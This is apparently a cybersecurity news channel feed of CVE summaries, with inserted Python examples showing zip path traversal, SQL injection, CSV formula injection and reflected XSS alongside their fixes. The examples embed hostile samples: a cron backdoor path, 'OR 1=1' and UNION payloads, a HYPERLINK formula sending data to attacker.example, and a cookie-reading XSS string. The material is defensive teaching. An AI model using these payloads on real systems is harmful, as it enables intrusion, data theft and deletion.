🛑 Cybersecurity & Privacy 🛑 - News
25.8K subscribers
89.2K links
🗞 The finest daily news on cybersecurity and privacy.

🔔 Daily releases.

💻 Is your online life secure?

📩 lalilolalo.dev@gmail.com
‼ CVE-2022-28763 ‼

The Zoom Client for Meetings (for Android, iOS, Linux, macOS, and Windows) before version 5.12.2 is susceptible to a URL parsing vulnerability. If a malicious Zoom meeting URL is opened, the malicious link may direct the user to connect to an arbitrary network address, leading to additional attacks including session takeovers.

📖 Read

via "National Vulnerability Database".
‼ CVE-2022-41772 ‼

Delta Electronics InfraSuite Device Master Versions 00.00.01a and prior mishandle .ZIP archives containing characters used in path traversal. This path traversal could result in remote code execution.

📖 Read

via "National Vulnerability Database".
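The path-traversal-through-archive pattern named in CVE-2022-41772 (often called "zip slip") is easy to reproduce and easy to check for. The following is an added example, not Delta Electronics code: it constructs a ZIP in memory with one benign member and one member whose name contains `../`, audits every member name against the extraction directory, and refuses to extract if any would escape. The hostile member name, the destination path and the schema of the report are assumptions made for the demo.

```python
"""Zip path-traversal ("zip slip") audit: find archive members whose names
would escape the extraction directory, and refuse to extract if any exist.

Added illustration of the vulnerability class described for CVE-2022-41772;
this is not Delta Electronics code, and the archive below is constructed here.
"""
import io
import os
import tempfile
import zipfile


def build_archive(include_traversal: bool = True) -> bytes:
    """Construct a ZIP with one benign member and, optionally, one traversal member.

    ZIP stores member names verbatim; nothing in the format stops '..'.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("firmware/config.xml", "<config/>")
        if include_traversal:
            # Hostile member name (constructed): lands in /etc/cron.d on a
            # naive extractor that does open(os.path.join(dest, name), "wb").
            zf.writestr("../../etc/cron.d/backdoor", "* * * * * root /tmp/x\n")
    return buf.getvalue()


def is_safe_member(dest_dir: str, member_name: str) -> bool:
    """True iff member_name, joined to dest_dir, still lies inside dest_dir."""
    dest = os.path.realpath(dest_dir)
    # Treat backslashes as separators too: a name like '..\\..\\x' is harmless
    # on POSIX but traverses when the same archive is unpacked on Windows.
    name = member_name.replace("\\", "/")
    # os.path.join discards dest when name is absolute, so '/etc/passwd'
    # fails the containment test below instead of silently passing.
    target = os.path.realpath(os.path.join(dest, name))
    return os.path.commonpath([dest, target]) == dest


def audit(archive: bytes, dest_dir: str) -> dict:
    """Classify every member as safe or unsafe relative to dest_dir."""
    report = {"safe": [], "unsafe": []}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            key = "safe" if is_safe_member(dest_dir, info.filename) else "unsafe"
            report[key].append(info.filename)
    return report


def extract_safely(archive: bytes, dest_dir: str) -> list:
    """Refuse the whole archive if any member is unsafe; otherwise extract.

    Rejecting rather than skipping keeps a half-written tree from being
    mistaken for a valid import.  Returns the member names written.
    """
    report = audit(archive, dest_dir)
    if report["unsafe"]:
        raise ValueError(f"traversal members: {report['unsafe']}")
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest_dir, info.filename.replace("\\", "/"))
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written


def extract_in_tempdir(archive: bytes):
    """Try extract_safely in a throwaway directory: None if refused, else names."""
    with tempfile.TemporaryDirectory() as dest:
        try:
            return extract_safely(archive, dest)
        except ValueError:
            return None


if __name__ == "__main__":
    print(audit(build_archive(), "/srv/devicemaster/uploads"))
```

Python's own `ZipFile.extract()` has sanitised member names since 2.7.4/3.3.1; the bug appears when code reads `info.filename` and builds the output path itself, or when the extractor is in a language or library that does not sanitise. The check above is the containment test such code needs before any `open()`.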
‼ CVE-2022-41657 ‼

Delta Electronics InfraSuite Device Master Versions 00.00.01a and prior allow attacker provided data already serialized into memory to be used in file operation application programming interfaces (APIs). This could create arbitrary files, which could be used in API operations and could ultimately result in remote code execution.

📖 Read

via "National Vulnerability Database".
‼ CVE-2022-42923 ‼

Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'id' parameter in the 'appCore/index.php?r=adm/mediagallery/delete' function in order to dump the entire database or delete all contents from the 'core_user_file' table.

📖 Read

via "National Vulnerability Database".
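The advisory describes an `id` parameter in a delete endpoint that lets a student dump the database or empty `core_user_file`. The following is an added example of that injection class, not Forma LMS code: a string-built `DELETE` whose ownership check is bypassed by `0 OR 1=1`, the same bug in a read path where a `UNION` turns a lookup into a schema dump, and the parameterised fix. Only the table name comes from the advisory; its columns, rows and the `id_user` ownership column are assumptions made for the demo.

```python
"""SQL injection through an integer 'id' parameter: the vulnerable query
versus the parameterised fix, run against an in-memory SQLite database.

Added illustration of the class described for CVE-2022-42923/42924/41680;
not Forma LMS code.  The table name core_user_file is the one named in the
advisory; its columns and rows are constructed here for the demo.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema: per-user uploaded files."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE core_user_file (id INTEGER PRIMARY KEY, id_user INTEGER, path TEXT)"
    )
    conn.executemany(
        "INSERT INTO core_user_file VALUES (?, ?, ?)",
        [(1, 10, "a.pdf"), (2, 10, "b.pdf"), (3, 11, "c.pdf")],
    )
    conn.commit()
    return conn


def remaining(conn: sqlite3.Connection) -> int:
    """Rows left in the table; used to observe the blast radius."""
    return conn.execute("SELECT COUNT(*) FROM core_user_file").fetchone()[0]


def delete_vulnerable(conn: sqlite3.Connection, current_user: int, file_id: str) -> int:
    """String-built query: the request parameter is pasted in as-is (the bug)."""
    sql = f"DELETE FROM core_user_file WHERE id_user = {current_user} AND id = {file_id}"
    # With file_id = "0 OR 1=1" the WHERE clause parses as
    # (id_user = 10 AND id = 0) OR 1=1, so every row of every user is deleted.
    return conn.execute(sql).rowcount


def delete_fixed(conn: sqlite3.Connection, current_user: int, file_id: str) -> int:
    """Validate the type, then bind: the value can never become SQL syntax."""
    try:
        fid = int(file_id)
    except ValueError:
        return 0
    return conn.execute(
        "DELETE FROM core_user_file WHERE id_user = ? AND id = ?", (current_user, fid)
    ).rowcount


def list_vulnerable(conn: sqlite3.Connection, file_id: str) -> list:
    """Same bug in a read path: a UNION turns a lookup into a database dump."""
    sql = f"SELECT path FROM core_user_file WHERE id = {file_id}"
    # file_id = "0 UNION SELECT sql FROM sqlite_master" returns the schema;
    # further UNIONs against the tables it reveals walk the whole database.
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    print("deleted:", delete_vulnerable(db, 10, "0 OR 1=1"), "left:", remaining(db))
    print(list_vulnerable(make_db(), "0 UNION SELECT sql FROM sqlite_master"))
```

Binding alone (`?` placeholders) closes the injection; the `int()` cast in front of it is what turns a malformed value into a clean "nothing deleted" instead of a database error that leaks the query shape.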
‼ CVE-2022-40287 ‼

The application was found to be vulnerable to an authenticated Stored Cross-Site Scripting (XSS) vulnerability in messaging functionality, leading to privilege escalation or a compromise of a targeted account.

📖 Read

via "National Vulnerability Database".
‼ CVE-2022-40294 ‼

The application was identified to have a CSV injection in data export functionality, allowing for malicious code to be embedded within export data and then triggered in exported data viewers.

📖 Read

via "National Vulnerability Database".
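CSV injection works because spreadsheet viewers evaluate any cell that begins with `=`, `+`, `-`, `@`, a tab or a carriage return as a formula, so attacker-supplied profile data exported to CSV becomes a formula on the analyst's machine. The following is an added example of an export that neutralises such cells, not the affected application's code; the sample rows and column names are constructed for the demo.

```python
"""CSV/formula injection in an export: cells that a spreadsheet would
evaluate as formulas are neutralised before the file is written.

Added illustration of the class described for CVE-2022-40294; not the
affected application's code.  The rows below are constructed sample data.
"""
import csv
import io

# Characters that make Excel, LibreOffice or Google Sheets treat a cell as a
# formula when the CSV is opened; tab and CR matter because a leading one is
# trimmed and the character after it is then interpreted.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula(value) -> bool:
    """True if a spreadsheet would evaluate this string instead of showing it."""
    if not isinstance(value, str):
        return False
    stripped = value.lstrip(" ")  # leading spaces are trimmed on import too
    return bool(stripped) and stripped[0] in FORMULA_TRIGGERS


def neutralize_cell(value):
    """Prefix formula-like strings with an apostrophe so they stay literal text.

    Non-string values (ints, floats) pass through untouched, so a genuine
    negative number is still written as a number rather than as "'-5".
    """
    if is_formula(value):
        return "'" + value
    return value


def export_csv(rows) -> str:
    """Write rows with every cell neutralised and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


def reimport(text: str) -> list:
    """Read the export back to confirm the payloads survive only as inert text."""
    return list(csv.reader(io.StringIO(text)))


# Constructed attacker-controlled profile data, as it might reach an export.
SAMPLE_ROWS = [
    ["user", "display_name", "balance"],
    ["alice", "Alice", -5],
    ["mallory", "=cmd|'/c calc'!A0", 0],
    ["eve", "\t=HYPERLINK(\"http://attacker.example/?\"&A1,\"click\")", 12],
    ["trent", "@SUM(1+1)*cmd|' /C calc'!A0", 3],
]


if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS))
```

The apostrophe prefix is the widely used mitigation, but some viewers display it literally on CSV import, so the exporter should document it; the more robust fix is to offer a format (such as XLSX written with cell types) where text cells cannot be promoted to formulas at all. Numeric columns must be emitted as numbers, not strings, or the negative-number case cannot be distinguished from a `-` payload.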
‼ CVE-2022-42924 ‼

Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'dyn_filter' parameter in the 'appLms/ajax.adm_server.php?r=widget/userselector/getusertabledata' function in order to dump the entire database.

📖 Read

via "National Vulnerability Database".
‼ CVE-2022-3783 ‼

A vulnerability, which was classified as problematic, has been found in node-red-dashboard. This issue affects some unknown processing of the file components/ui-component/ui-component-ctrl.js of the component ui_text Format Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 9305d1a82f19b235dfad24a7d1dd4ed244db7743. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-212555.

📖 Read

via "National Vulnerability Database".
‼ CVE-2022-40290 ‼

The application was vulnerable to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability in the barcode generation functionality, allowing attackers to generate an unsafe link that could compromise users.

📖 Read

via "National Vulnerability Database".
‼ CVE-2022-41681 ‼

There is a vulnerability on Forma LMS version 3.1.0 and earlier that could allow an authenticated attacker (with the role of student) to privilege escalate in order to upload a Zip file through the SCORM importer feature. The exploitation of this vulnerability could lead to a remote code injection.

📖 Read

via "National Vulnerability Database".
‼ CVE-2022-41679 ‼

Forma LMS version 3.1.0 and earlier are affected by a cross-site scripting vulnerability that could allow a remote attacker to inject JavaScript code in the "back_url" parameter of the appLms/index.php?modname=faq&op=play function. The exploitation of this vulnerability could allow an attacker to steal the user's cookies in order to log in to the application.

📖 Read

via "National Vulnerability Database".
‼ CVE-2022-40190 ‼

SAUTER Controls moduWeb firmware version 2.7.1 is vulnerable to reflective cross-site scripting (XSS). The web application does not adequately sanitize request strings of malicious JavaScript. An attacker utilizing XSS could then execute malicious code in users' browsers and steal sensitive information, including user credentials.

📖 Read

via "National Vulnerability Database".
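Both reflected-XSS items above (the `back_url` parameter in CVE-2022-41679 and the unsanitised request strings in CVE-2022-40190) come down to a request value being written into a page unchanged. The following is an added example, not Forma LMS or SAUTER code, of how a "back" link parameter should be handled: validate it as a same-origin path first, because HTML escaping alone still lets `javascript:` through an `href`, then escape it for the attribute context. The template fragment, the default target and the request values are assumptions made for the demo.

```python
"""Reflected parameter (back_url) rendered into a page: validate the value
as a same-origin path, then HTML-escape it for the attribute context, so
that javascript:, external hosts and attribute break-outs are never emitted.

Added illustration of the class described for CVE-2022-41679 and
CVE-2022-40190; not Forma LMS or SAUTER code.  The template fragment and
the request values used with it are constructed here.
"""
import html
from urllib.parse import urlsplit


def safe_back_url(raw: str, default: str = "/index.php") -> str:
    """Accept only a relative, same-origin path; fall back to default otherwise."""
    if not raw:
        return default
    parts = urlsplit(raw)
    # Any scheme (javascript:, data:, http:) or host (//evil.example) is rejected;
    # escaping alone would not stop a browser from running javascript: in href.
    if parts.scheme or parts.netloc:
        return default
    # Browsers normalise backslashes to '/', so '/\\evil.example' becomes an
    # external redirect; control characters can split headers or attributes.
    if "\\" in raw or any(ord(c) < 0x20 for c in raw):
        return default
    if not raw.startswith("/") or raw.startswith("//"):
        return default
    return raw


def render_link(raw_back_url: str) -> str:
    """The template as it should be: validated, then escaped for an attribute."""
    target = safe_back_url(raw_back_url)
    return '<a href="' + html.escape(target, quote=True) + '">Back</a>'


def render_link_vulnerable(raw_back_url: str) -> str:
    """The bug: the request parameter is concatenated straight into the attribute."""
    return '<a href="' + raw_back_url + '">Back</a>'


if __name__ == "__main__":
    payload = '" onmouseover="alert(document.cookie)'
    print(render_link_vulnerable(payload))
    print(render_link(payload))
```

The two functions are deliberately separate: `safe_back_url` decides what the link may point at (an open-redirect and `javascript:` control), `html.escape` decides how it is written into the markup (the XSS control). Dropping either one leaves a hole the other does not cover.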
‼ CVE-2022-3784 ‼

A vulnerability classified as critical was found in Axiomatic Bento4 5e7bb34. Affected by this vulnerability is the function AP4_Mp4AudioDsiParser::ReadBits of the file Ap4Mp4AudioInfo.cpp of the component mp4hls. The manipulation leads to heap-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212563.

📖 Read

via "National Vulnerability Database".
‼ CVE-2022-3785 ‼

A vulnerability, which was classified as critical, has been found in Axiomatic Bento4. Affected by this issue is the function AP4_DataBuffer::SetDataSize of the component Avcinfo. The manipulation leads to heap-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212564.

📖 Read

via "National Vulnerability Database".
‼ CVE-2022-40291 ‼

The application was vulnerable to Cross-Site Request Forgery (CSRF) attacks, allowing an attacker to coerce users into sending malicious requests to the site to delete their account, or in rare circumstances, hijack their account and create other admin accounts.

📖 Read

via "National Vulnerability Database".
‼ CVE-2022-41680 ‼

Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'search[value]' parameter in the 'appLms/ajax.server.php?r=mycertificate/getMyCertificates' function in order to dump the entire database.

📖 Read

via "National Vulnerability Database".
‼ CVE-2022-43752 ‼

** UNSUPPORTED WHEN ASSIGNED ** Oracle Solaris version 10 1/13, when using the Common Desktop Environment (CDE), is vulnerable to a privilege escalation vulnerability. A low privileged user can escalate to root by crafting a malicious printer and double clicking on the crafted printer's icon.

📖 Read

via "National Vulnerability Database".
‼ CVE-2022-42925 ‼

There is a vulnerability on Forma LMS version 3.1.0 and earlier that could allow an authenticated attacker (with the role of student) to privilege escalate in order to upload a Zip file through the plugin upload component. The exploitation of this vulnerability could lead to a remote code injection.

📖 Read

via "National Vulnerability Database".
⚠ Psychotherapy extortion suspect: arrest warrant issued ⚠

Wanted! Not only the extortionist who abused the data, but also the CEO who let it happen.

📖 Read

via "Naked Security".
πŸ‘1
‼ CVE-2021-27784 ‼

The provided HCL Launch Container images contain non-unique HTTPS certificates and a database encryption key. The fix provides directions and tools to replace the non-unique keys and certificates. This does not affect the standard installer packages.

📖 Read

via "National Vulnerability Database".
📢 Australia's Department of Defence becomes latest victim of regional ransomware attacks 📢

Military information was not stolen in the breach, which may affect the records of 40,000 defence personnel

📖 Read

via "ITPro".
πŸ‘1